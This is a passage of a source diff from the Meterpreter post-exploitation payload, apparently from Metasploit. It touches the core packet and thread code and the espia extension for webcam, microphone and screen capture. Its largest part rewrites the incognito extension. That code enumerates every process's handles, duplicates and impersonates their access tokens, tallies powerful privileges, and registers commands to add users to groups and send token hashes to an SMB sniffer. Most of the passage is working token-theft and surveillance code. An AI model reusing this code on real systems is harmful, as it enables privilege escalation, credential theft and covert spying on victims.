dprintf( "[CHANNEL] Opened %s %u", channelType, flags );
// Get the channel class and set it
newChannel->cls = packet_get_tlv_value_uint(packet, TLV_TYPE_CHANNEL_CLASS);
dprintf( "[CHANNEL] Channel class for %s: %u", channelType, newChannel->cls );
// Add the new channel identifier to the response
if ((res = packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID,
channel_get_id(newChannel))) != ERROR_SUCCESS)
break;
// Transmit the response
dprintf( "[CHANNEL] Sending response for %s", channelType );
res = packet_transmit(remote, response, NULL);
dprintf( "[CHANNEL] Done" );
} while (0);
return res;
@ -616,29 +615,23 @@ DWORD remote_request_core_crypto_negotiate(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
/*
* core_shutdown
* -----------------
*
*/
DWORD remote_request_core_shutdown(Remote *remote, Packet *packet)
DWORD remote_request_core_shutdown( Remote *remote, Packet *packet, DWORD* pResult )
{
Channel *channel = NULL;
Packet *response = packet_create_response(packet);
Packet *response = packet_create_response( packet );
DWORD result = ERROR_SUCCESS;
// Acknowledge the shutdown request
packet_add_tlv_bool(response, TLV_TYPE_BOOL, TRUE);
packet_add_tlv_bool( response, TLV_TYPE_BOOL, TRUE );
// Transmit the response
packet_transmit_response(result, remote, response);
packet_transmit_response( result, remote, response );
#ifdef _WIN32
// see note about posix above - egypt
dprintf("[SHUTDOWN] Shutting down the Meterpreter thread 1 (killing the main thread)...");
thread_kill( serverThread );
#endif
return result;
*pResult = result;
return TRUE;
}

3
c/meterpreter/source/common/common.c

@ -46,9 +46,6 @@ int current_unix_timestamp(void) {
int debugging_enabled;
/*
*/
/*!
* @brief Output a debug string to the debug console.
* @details The function emits debug strings via `OutputDebugStringA`, hence all messages can be viewed

6
c/meterpreter/source/common/common.h

@ -161,7 +161,7 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
#include <wininet.h>
/*! @brief When defined, debug output is enabled. */
/*! @brief When defined, debug output is enabled on Windows builds. */
//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
@ -180,9 +180,9 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
#define CONTINUE_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); continue; }
/*! @brief Close a service handle if not already closed and set the handle to NULL. */
#define CLOSE_SERVICE_HANDLE( h ) if( h ) { CloseServiceHandle( h ); h = NULL; }
#define CLOSE_SERVICE_HANDLE( h ) if( h ) { CloseServiceHandle( h ); h = NULL; }
/*! @brief Close a handle if not already closed and set the handle to NULL. */
#define CLOSE_HANDLE( h ) if( h ) { DWORD dwHandleFlags; if(GetHandleInformation( h , &dwHandleFlags)) CloseHandle( h ); h = NULL; }
#define CLOSE_HANDLE( h ) if( h ) { DWORD dwHandleFlags; if(GetHandleInformation( h , &dwHandleFlags)) CloseHandle( h ); h = NULL; }
#ifdef DEBUGTRACE
/*!

2
c/meterpreter/source/common/compat_types.h

@ -174,9 +174,11 @@ typedef char BYTE;
typedef uint32_t ULONG;
typedef uint32_t * PULONG;
typedef const char CSTR;
typedef const wchar_t CWSTR;
typedef unsigned char UCHAR;
typedef UCHAR * PUCHAR;
typedef CSTR * LPCSTR;
typedef CWSTR * LPCWSTR;
typedef char * LPSTR;
typedef long DWORD;
typedef DWORD * LPDWORD;

28
c/meterpreter/source/common/core.c

@ -319,6 +319,34 @@ DWORD packet_add_tlv_string( Packet *packet, TlvType type, LPCSTR str )
return packet_add_tlv_raw(packet, type, (PUCHAR)str, (DWORD)strlen(str) + 1);
}
/*!
* @brief Add a wide-string value TLV to a packet, including the \c NULL terminator.
* @param packet Pointer to the packet to add the value to.
* @param type TLV type for the value.
* @param str Pointer to the wide-string value to add to the packet.
* @return Indication of success or failure.
* @retval ERROR_SUCCESS The operation completed successfully.
* @retval ERROR_NOT_ENOUGH_MEMORY Insufficient memory available.
*/
DWORD packet_add_tlv_wstring(Packet *packet, TlvType type, LPCWSTR str)
{
DWORD dwResult;
size_t charCount = wcslen(str);
LPSTR lpStr = (LPSTR)malloc(charCount + 1);
if (lpStr) {
wcstombs(lpStr, str, charCount);
lpStr[charCount] = 0;
dwResult = packet_add_tlv_raw(packet, type, (PUCHAR)lpStr, charCount + 1);
free(lpStr);
}
else {
dwResult = ERROR_NOT_ENOUGH_MEMORY;
}
return dwResult;
}
/*!
* @brief Add a unsigned integer value TLV to a packet.
* @param packet Pointer to the packet to add the value to.

1
c/meterpreter/source/common/core.h

@ -210,6 +210,7 @@ LINKAGE Packet *packet_duplicate(Packet *packet);
LINKAGE VOID packet_destroy(Packet *packet);
LINKAGE DWORD packet_add_tlv_string(Packet *packet, TlvType type, LPCSTR str);
LINKAGE DWORD packet_add_tlv_wstring(Packet *packet, TlvType type, LPCWSTR str);
LINKAGE DWORD packet_add_tlv_uint(Packet *packet, TlvType type, UINT val);
LINKAGE DWORD packet_add_tlv_qword(Packet *packet, TlvType type, QWORD val );
LINKAGE DWORD packet_add_tlv_bool(Packet *packet, TlvType type, BOOL val);

3
c/meterpreter/source/common/thread.c

@ -334,7 +334,7 @@ void *__paused_thread(void *req)
/*
* Create a new thread in a suspended state.
*/
THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2 )
THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3 )
{
THREAD * thread = NULL;
@ -357,6 +357,7 @@ THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2 )
thread->parameter1 = param1;
thread->parameter2 = param2;
thread->parameter3 = param3;
#ifdef _WIN32
thread->handle = CreateThread( NULL, 0, funk, thread, CREATE_SUSPENDED, &thread->id );

3
c/meterpreter/source/common/thread.h

@ -60,6 +60,7 @@ typedef struct _THREAD
EVENT * sigterm;
LPVOID parameter1;
LPVOID parameter2;
LPVOID parameter3;
#ifndef _WIN32
void *suspend_thread_data;
pthread_t pid;
@ -99,7 +100,7 @@ BOOL event_poll( EVENT * event, DWORD timeout );
THREAD * thread_open( VOID );
THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2 );
THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3 );
BOOL thread_run( THREAD * thread );

42
c/meterpreter/source/extensions/espia/espia.c

@ -22,29 +22,10 @@ EnableDelayLoadMetSrv();
Command customCommands[] =
{
// Video
{ "espia_video_get_dev_image",
{ request_video_get_dev_image, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Audio
{ "espia_audio_get_dev_audio",
{ request_audio_get_dev_audio, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Screen
{ "espia_image_get_dev_screen",
{ request_image_get_dev_screen, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "espia_video_get_dev_image", request_video_get_dev_image ),
COMMAND_REQ( "espia_audio_get_dev_audio", request_audio_get_dev_audio ),
COMMAND_REQ( "espia_image_get_dev_screen", request_image_get_dev_screen ),
COMMAND_TERMINATOR
};
/*
@ -56,13 +37,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
hMetSrv = remote->hMetSrv;
for (index = 0; customCommands[index].method; index++)
{
dprintf("Registering command index %d", index);
dprintf(" Command: %s", customCommands[index].method);
dprintf(" Register: 0x%.8x", command_register);
command_register(&customCommands[index]);
}
command_register_all( customCommands );
return ERROR_SUCCESS;
}
@ -72,12 +47,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
DWORD index;
for (index = 0;
customCommands[index].method;
index++)
command_deregister(&customCommands[index]);
command_deregister_all( customCommands );
return ERROR_SUCCESS;
}

5
c/meterpreter/source/extensions/incognito/hash_stealer.c

@ -21,6 +21,7 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
SavedToken *token_list = NULL;
NETRESOURCEA nr;
HANDLE saved_token;
TOKEN_PRIVS token_privs;
char conn_string[BUF_SIZE] = "", domain_name[BUF_SIZE] = "", *smb_sniffer_ip = NULL,
return_value[BUF_SIZE] = "", temp[BUF_SIZE] = "";
@ -39,7 +40,7 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token))
saved_token = INVALID_HANDLE_VALUE;
token_list = get_token_list(&num_tokens);
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
packet_transmit_response(GetLastError(), remote, response);
@ -50,7 +51,7 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
{
get_domain_from_token(token_list[i].token, domain_name);
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
// If token is not "useless" local account connect to sniffer
if (_stricmp(domain_name, "NT AUTHORITY"))
{

69
c/meterpreter/source/extensions/incognito/incognito.c

@ -36,6 +36,7 @@ DWORD request_incognito_list_tokens(Remote *remote, Packet *packet)
SavedToken *token_list = NULL;
BOOL bTokensAvailable = FALSE;
TOKEN_ORDER token_order;
TOKEN_PRIVS token_privs;
char *delegation_tokens = calloc(sizeof(char), BUF_SIZE),
*impersonation_tokens = calloc(sizeof(char), BUF_SIZE),
temp[BUF_SIZE] = "";
@ -44,7 +45,7 @@ DWORD request_incognito_list_tokens(Remote *remote, Packet *packet)
token_order = packet_get_tlv_value_uint(packet, TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER);
// Enumerate tokens
token_list = get_token_list(&num_tokens);
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
@ -109,12 +110,13 @@ DWORD request_incognito_impersonate_token(Remote *remote, Packet *packet)
BOOL bTokensAvailable = FALSE, delegation_available = FALSE;
char temp[BUF_SIZE] = "", *requested_username, return_value[BUF_SIZE] = "";
HANDLE xtoken;
TOKEN_PRIVS token_privs;
Packet *response = packet_create_response(packet);
requested_username = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN);
// Enumerate tokens
token_list = get_token_list(&num_tokens);
token_list = get_token_list(&num_tokens, &token_privs);
if (!token_list)
{
@ -179,47 +181,13 @@ cleanup:
Command customCommands[] =
{
// List tokens
{ "incognito_list_tokens",
{ request_incognito_list_tokens, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Impersonate token
{ "incognito_impersonate_token",
{ request_incognito_impersonate_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Add user to host
{ "incognito_add_user",
{ request_incognito_add_user, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Add user to group
{ "incognito_add_group_user",
{ request_incognito_add_group_user, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Add user to local group
{ "incognito_add_localgroup_user",
{ request_incognito_add_localgroup_user, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Snarf token hashes
{ "incognito_snarf_hashes",
{ request_incognito_snarf_hashes, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "incognito_list_tokens", request_incognito_list_tokens ),
COMMAND_REQ( "incognito_impersonate_token", request_incognito_impersonate_token ),
COMMAND_REQ( "incognito_add_user", request_incognito_add_user ),
COMMAND_REQ( "incognito_add_group_user", request_incognito_add_group_user ),
COMMAND_REQ( "incognito_add_localgroup_user", request_incognito_add_localgroup_user ),
COMMAND_REQ( "incognito_snarf_hashes", request_incognito_snarf_hashes ),
COMMAND_TERMINATOR
};
/*
@ -231,13 +199,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
hMetSrv = remote->hMetSrv;
for (index = 0; customCommands[index].method; index++)
{
dprintf("Registering command index %d", index);
dprintf(" Command: %s", customCommands[index].method);
dprintf(" Register: 0x%.8x", command_register);
command_register(&customCommands[index]);
}
command_register_all( customCommands );
return ERROR_SUCCESS;
}
@ -247,12 +209,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
DWORD index;
for (index = 0;
customCommands[index].method;
index++)
command_deregister(&customCommands[index]);
command_deregister_all( customCommands );
return ERROR_SUCCESS;
}

271
c/meterpreter/source/extensions/incognito/list_tokens.c

@ -39,6 +39,20 @@ typedef struct _SYSTEM_HANDLE_INFORMATION {
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryOffset;
BYTE Reserved1[52];
PVOID Reserved2[3];
HANDLE UniqueProcessId;
PVOID Reserved3;
ULONG HandleCount;
BYTE Reserved4[4];
PVOID Reserved5[11];
SIZE_T PeakPagefileUsage;
SIZE_T PrivatePageCount;
LARGE_INTEGER Reserved6[6];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
@ -49,6 +63,7 @@ typedef struct _UNICODE_STRING {
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_BUFFER_OVERFLOW ((NTSTATUS)0x80000005L)
#define SystemHandleInformation 16
#define SystemProcessInformation 5
typedef NTSTATUS (WINAPI *NTQUERYSYSTEMINFORMATION)(DWORD SystemInformationClass,
PVOID SystemInformation,
@ -89,68 +104,239 @@ LPWSTR GetObjectInfo(HANDLE hObject, OBJECT_INFORMATION_CLASS objInfoClass)
return data;
}
SavedToken *get_token_list(DWORD *num_tokens_enum)
static int compare_token_names(const unique_user_token *a, const unique_user_token *b)
{
DWORD total=0, i, num_tokens=0, token_list_size = BUF_SIZE, dwSize = sizeof(SYSTEM_HANDLE_INFORMATION);
HANDLE process;
PSYSTEM_HANDLE_INFORMATION pHandleInfo;
return _stricmp(a->username, b->username);
}
SavedToken *get_token_list(DWORD *num_tokens_enum, TOKEN_PRIVS *token_privs)
{
DWORD total=0, i, j, num_tokens=0, token_list_size = BUF_SIZE, dwSize = sizeof(SYSTEM_HANDLE_INFORMATION), dwError;
HANDLE process, hObject;
PSYSTEM_PROCESS_INFORMATION pProcessInfo=NULL;
PSYSTEM_PROCESS_INFORMATION original_pProcessInfo=NULL;
NTSTATUS ntReturn;
BOOL bMoreProcesses = TRUE;
LPVOID TokenPrivilegesInfo[BUF_SIZE];
DWORD returned_privileges_length, returned_name_length;
char privilege_name[BUF_SIZE];
HANDLE hObject2=NULL;
SavedToken *token_list = (SavedToken*)calloc(token_list_size, sizeof(SavedToken));
*num_tokens_enum = 0;
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
NtQueryObject= (NTQUERYOBJECT)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryObject");
token_privs->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE = FALSE;
token_privs->SE_CREATE_TOKEN_PRIVILEGE = FALSE;
token_privs->SE_TCB_PRIVILEGE = FALSE;
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = FALSE;
token_privs->SE_BACKUP_PRIVILEGE = FALSE;
token_privs->SE_RESTORE_PRIVILEGE = FALSE;
token_privs->SE_DEBUG_PRIVILEGE = FALSE;
token_privs->SE_IMPERSONATE_PRIVILEGE = FALSE;
token_privs->SE_RELABEL_PRIVILEGE = FALSE;
token_privs->SE_LOAD_DRIVER_PRIVILEGE = FALSE;
pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(dwSize);
ntReturn = NtQuerySystemInformation(SystemHandleInformation, pHandleInfo, dwSize, &dwSize);
if(ntReturn == STATUS_INFO_LENGTH_MISMATCH){
free(pHandleInfo);
pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(dwSize);
ntReturn = NtQuerySystemInformation(SystemHandleInformation, pHandleInfo, dwSize, &dwSize);
// Enable debug privs if possible
OpenProcessToken(GetCurrentProcess(), GENERIC_ALL/*MAXIMUM_ALLOWED*/, &hObject);
has_impersonate_priv(hObject);
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(GetModuleHandle("NTDLL.DLL"), "NtQuerySystemInformation");
NtQueryObject= (NTQUERYOBJECT)GetProcAddress(GetModuleHandle("NTDLL.DLL"), "NtQueryObject");
dwSize = 256*1000;
pProcessInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(dwSize);
ntReturn = NtQuerySystemInformation(SystemProcessInformation, pProcessInfo, dwSize, &dwSize);
while (ntReturn == STATUS_INFO_LENGTH_MISMATCH) {
free(pProcessInfo);
pProcessInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(dwSize);
ntReturn = NtQuerySystemInformation(SystemProcessInformation, pProcessInfo, dwSize, &dwSize);
}
*num_tokens_enum = 0;
original_pProcessInfo = pProcessInfo;
if(ntReturn == STATUS_SUCCESS)
{
for(i = 0; i < pHandleInfo->uCount; i++)
{
process = OpenProcess(MAXIMUM_ALLOWED,FALSE, pHandleInfo->Handles[i].uIdProcess);
if(process != INVALID_HANDLE_VALUE)
{
HANDLE hObject = NULL;
if(DuplicateHandle(process, (HANDLE)pHandleInfo->Handles[i].Handle,
GetCurrentProcess(), &hObject, MAXIMUM_ALLOWED, FALSE, 0x02) != FALSE)
while (bMoreProcesses)
{
if (pProcessInfo->NextEntryOffset == 0)
bMoreProcesses = FALSE;
// if has impersonate privs, only needs read access
process = OpenProcess(MAXIMUM_ALLOWED,FALSE, (DWORD)pProcessInfo->UniqueProcessId);
for(i = 0; i < pProcessInfo->HandleCount; i++)
{
if(process != INVALID_HANDLE_VALUE)
{
LPWSTR lpwsType=NULL ;
lpwsType = GetObjectInfo(hObject, ObjectTypeInformation);
hObject = NULL;
if ((lpwsType!=NULL) && !wcscmp(lpwsType, L"Token") )
if(DuplicateHandle(process, (HANDLE)((i+1)*4),
GetCurrentProcess(), &hObject, MAXIMUM_ALLOWED, FALSE, 0x02) != FALSE)
{
// Reallocate space if necessary
if(*num_tokens_enum >= token_list_size)
LPWSTR lpwsType=NULL;
lpwsType = GetObjectInfo(hObject, ObjectTypeInformation);
if ((lpwsType!=NULL) && !wcscmp(lpwsType, L"Token") && ImpersonateLoggedOnUser(hObject) != 0)
{
token_list_size *= 2;
token_list = (SavedToken*)realloc(token_list, token_list_size*sizeof(SavedToken));
if (!token_list)
goto cleanup;
// ImpersonateLoggedOnUser() always returns true. Need to check whether impersonated token kept impersonate status - failure degrades to identification
// also revert to self after getting new token context
// only process if it was impersonation or higher
OpenThreadToken(GetCurrentThread(), MAXIMUM_ALLOWED, TRUE, &hObject2);
RevertToSelf();
if (is_impersonation_token(hObject2) )
{
// Reallocate space if necessary
if(*num_tokens_enum >= token_list_size)
{
token_list_size *= 2;
token_list = (SavedToken*)realloc(token_list, token_list_size*sizeof(SavedToken));
if (!token_list)
goto cleanup;
}
token_list[*num_tokens_enum].token = hObject;
get_domain_username_from_token(hObject, token_list[*num_tokens_enum].username);
if (GetTokenInformation(hObject, TokenPrivileges, TokenPrivilegesInfo, BUF_SIZE, &returned_privileges_length))
{
if (((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount > 0)
for (j=0;j<((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount;j++)
{
returned_name_length = BUF_SIZE;
LookupPrivilegeNameA(NULL, &(((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->Privileges[j].Luid), privilege_name, &returned_name_length);
if (strcmp(privilege_name, "SeAssignPrimaryTokenPrivilege") == 0)
{
token_privs->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeCreateTokenPrivilege") == 0)
{
token_privs->SE_CREATE_TOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTcbPrivilege") == 0)
{
token_privs->SE_TCB_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTakeOwnershipPrivilege") == 0)
{
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeBackupPrivilege") == 0)
{
token_privs->SE_BACKUP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRestorePrivilege") == 0)
{
token_privs->SE_RESTORE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeDebugPrivilege") == 0)
{
token_privs->SE_DEBUG_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeImpersonatePrivilege") == 0)
{
token_privs->SE_IMPERSONATE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRelabelPrivilege") == 0)
{
token_privs->SE_RELABEL_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeLoadDriverPrivilege") == 0)
{
token_privs->SE_LOAD_DRIVER_PRIVILEGE = TRUE;
}
}
}
(*num_tokens_enum)++;
}
CloseHandle(hObject2);
}
token_list[*num_tokens_enum].token = hObject;
get_domain_username_from_token(hObject, token_list[*num_tokens_enum].username);
(*num_tokens_enum)++;
else
CloseHandle(hObject);
}
else
CloseHandle(hObject);
}
CloseHandle(process);
}
}
}
// Also process primary
// if has impersonate privs, only needs read access
process = OpenProcess(MAXIMUM_ALLOWED, FALSE, (DWORD)pProcessInfo->UniqueProcessId);
dwError = OpenProcessToken(process, MAXIMUM_ALLOWED, &hObject);
if (dwError !=0 && ImpersonateLoggedOnUser(hObject) != 0)
{
// ImpersonateLoggedOnUser() always returns true. Need to check whether impersonated token kept impersonate status - failure degrades to identification
// also revert to self after getting new token context
// only process if it was impersonation or higher
OpenThreadToken(GetCurrentThread(), MAXIMUM_ALLOWED, TRUE, &hObject2);
RevertToSelf();
if (is_impersonation_token(hObject2))
{
token_list[*num_tokens_enum].token = hObject;
get_domain_username_from_token(hObject, token_list[*num_tokens_enum].username);
(*num_tokens_enum)++;
if (GetTokenInformation(hObject, TokenPrivileges, TokenPrivilegesInfo, BUF_SIZE, &returned_privileges_length))
{
for (i=0;i<((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount;i++)
{
returned_name_length = BUF_SIZE;
LookupPrivilegeNameA(NULL, &(((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->Privileges[i].Luid), privilege_name, &returned_name_length);
if (strcmp(privilege_name, "SeAssignPrimaryTokenPrivilege") == 0)
{
token_privs->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeCreateTokenPrivilege") == 0)
{
token_privs->SE_CREATE_TOKEN_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTcbPrivilege") == 0)
{
token_privs->SE_TCB_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeTakeOwnershipPrivilege") == 0)
{
token_privs->SE_TAKE_OWNERSHIP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeBackupPrivilege") == 0)
{
token_privs->SE_BACKUP_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRestorePrivilege") == 0)
{
token_privs->SE_RESTORE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeDebugPrivilege") == 0)
{
token_privs->SE_DEBUG_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeImpersonatePrivilege") == 0)
{
token_privs->SE_IMPERSONATE_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeRelabelPrivilege") == 0)
{
token_privs->SE_RELABEL_PRIVILEGE = TRUE;
}
else if (strcmp(privilege_name, "SeLoadDriverPrivilege") == 0)
{
token_privs->SE_LOAD_DRIVER_PRIVILEGE = TRUE;
}
}
}
}
CloseHandle(hObject2);
}
pProcessInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pProcessInfo + (ULONG)pProcessInfo->NextEntryOffset);
}
}
cleanup:
free(pHandleInfo);
free(original_pProcessInfo);
return token_list;
}
void process_user_token(HANDLE token, unique_user_token *uniq_tokens, DWORD *num_tokens, TOKEN_ORDER token_order)
@ -182,7 +368,8 @@ void process_user_token(HANDLE token, unique_user_token *uniq_tokens, DWORD *num
// Check
if (!_stricmp("None", strchr(full_name, '\\') + 1) || !_stricmp("Everyone", strchr(full_name, '\\') + 1)
|| !_stricmp("LOCAL", strchr(full_name, '\\') + 1) || !_stricmp("NULL SID", strchr(full_name, '\\') + 1))
|| !_stricmp("LOCAL", strchr(full_name, '\\') + 1) || !_stricmp("NULL SID", strchr(full_name, '\\') + 1)
|| !_stricmp("CONSOLE LOGON", strchr(full_name, '\\') + 1))
continue;
// Check to see if username has been seen before
@ -204,7 +391,7 @@ void process_user_token(HANDLE token, unique_user_token *uniq_tokens, DWORD *num
// If token user has not been seen yet then create new entry
if (!user_exists)
{
strcpy(uniq_tokens[*num_tokens].username, full_name);
strcpy_s(uniq_tokens[*num_tokens].username, MAX_USERNAME, full_name);
uniq_tokens[*num_tokens].token_num = 1;
uniq_tokens[*num_tokens].delegation_available = FALSE;
uniq_tokens[*num_tokens].impersonation_available = FALSE;

21
c/meterpreter/source/extensions/incognito/list_tokens.h

@ -8,9 +8,11 @@ typedef struct
HANDLE token;
} SavedToken;
#define MAX_USERNAME 256
typedef struct
{
char username[256];
char username[MAX_USERNAME];
int token_num;
BOOL delegation_available;
BOOL impersonation_available;
@ -22,8 +24,21 @@ typedef enum
BY_GROUP
} TOKEN_ORDER;
SavedToken *get_token_list(DWORD *num_tokens_enum);
void list_unique_tokens(TOKEN_ORDER);
typedef struct
{
BOOL SE_ASSIGNPRIMARYTOKEN_PRIVILEGE;
BOOL SE_CREATE_TOKEN_PRIVILEGE;
BOOL SE_TCB_PRIVILEGE;
BOOL SE_TAKE_OWNERSHIP_PRIVILEGE;
BOOL SE_BACKUP_PRIVILEGE;
BOOL SE_RESTORE_PRIVILEGE;
BOOL SE_DEBUG_PRIVILEGE;
BOOL SE_IMPERSONATE_PRIVILEGE;
BOOL SE_RELABEL_PRIVILEGE;
BOOL SE_LOAD_DRIVER_PRIVILEGE;
} TOKEN_PRIVS;
SavedToken *get_token_list(DWORD *num_tokens_enum, TOKEN_PRIVS *token_privs);
void process_user_token(HANDLE, unique_user_token*, DWORD*, TOKEN_ORDER);
#endif

81
c/meterpreter/source/extensions/incognito/token_info.c

@ -11,7 +11,7 @@
#include <wchar.h>
#include "incognito.h"
BOOL get_domain_from_token(HANDLE token, char *domain_to_return)
BOOL get_domain_from_token(HANDLE token, char *domainBuffer, DWORD domainBufferSize)
{
LPVOID TokenUserInfo[BUF_SIZE];
char username[BUF_SIZE] = "", domainname[BUF_SIZE] = "";
@ -21,7 +21,7 @@ BOOL get_domain_from_token(HANDLE token, char *domain_to_return)
return FALSE;
LookupAccountSidA(NULL, ((TOKEN_USER*)TokenUserInfo)->User.Sid, username, &user_length, domainname, &domain_length, (PSID_NAME_USE)&sid_type);
strcpy(domain_to_return, domainname);
strcpy_s(domainBuffer, domainBufferSize, domainname);
return TRUE;
}
@ -50,15 +50,26 @@ BOOL get_domain_groups_from_token(HANDLE token, char **group_name_array[], DWORD
if (!GetTokenInformation(token, TokenGroups, TokenGroupsInfo, BUF_SIZE, &returned_tokinfo_length))
return FALSE;
*group_name_array = (char**)calloc(((TOKEN_GROUPS*)TokenGroupsInfo)->GroupCount, sizeof(char*));
*num_groups = ((TOKEN_GROUPS*)TokenGroupsInfo)->GroupCount;
for (i=0;i<*num_groups;i++)
{
LookupAccountSidA(NULL, ((TOKEN_GROUPS*)TokenGroupsInfo)->Groups[i].Sid, groupname, &group_length, domainname, &domain_length, (PSID_NAME_USE)&sid_type);
(*group_name_array)[i] = (char*)calloc(BUF_SIZE, sizeof(char));
// Make full name in DOMAIN\GROUPNAME format
sprintf((*group_name_array)[i], "%s\\%s", domainname, groupname);
if((((TOKEN_GROUPS*)TokenGroupsInfo)->Groups[i].Attributes & SE_GROUP_ENABLED) != 0)
{
group_length = BUF_SIZE;
domain_length = BUF_SIZE; // fix bug with insufficient buffer size due to reusing last length value
LookupAccountSidA(NULL, ((TOKEN_GROUPS*)TokenGroupsInfo)->Groups[i].Sid, groupname, &group_length, domainname, &domain_length, (PSID_NAME_USE)&sid_type);
(*group_name_array)[i] = (char*)calloc(BUF_SIZE, sizeof(char));
// Make full name in DOMAIN\GROUPNAME format
sprintf((*group_name_array)[i], "%s\\%s", domainname, groupname);
}
else
{
(*group_name_array)[i] = (char*)calloc(BUF_SIZE, sizeof(char));
sprintf((*group_name_array)[i], "%s\\%s", domainname, groupname);
}
}
return TRUE;
@ -147,4 +158,60 @@ BOOL is_local_system()
return TRUE;
else
return FALSE;
}
}
BOOL has_impersonate_priv(HANDLE hToken)
{
LUID luid;
LPVOID TokenPrivilegesInfo[BUF_SIZE];
DWORD returned_privileges_length, returned_name_length, i;
char privilege_name[BUF_SIZE];
if(!LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid))
goto exit;
if (GetTokenInformation(hToken, TokenPrivileges, TokenPrivilegesInfo, BUF_SIZE, &returned_privileges_length))
{
for (i=0;i<((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->PrivilegeCount;i++)
{
returned_name_length = BUF_SIZE;
LookupPrivilegeNameA(NULL, &(((TOKEN_PRIVILEGES*)TokenPrivilegesInfo)->Privileges[i].Luid), privilege_name, &returned_name_length);
if (strcmp(privilege_name, "SeImpersonatePrivilege") == 0)
return TRUE;
}
}
exit:
if(hToken)
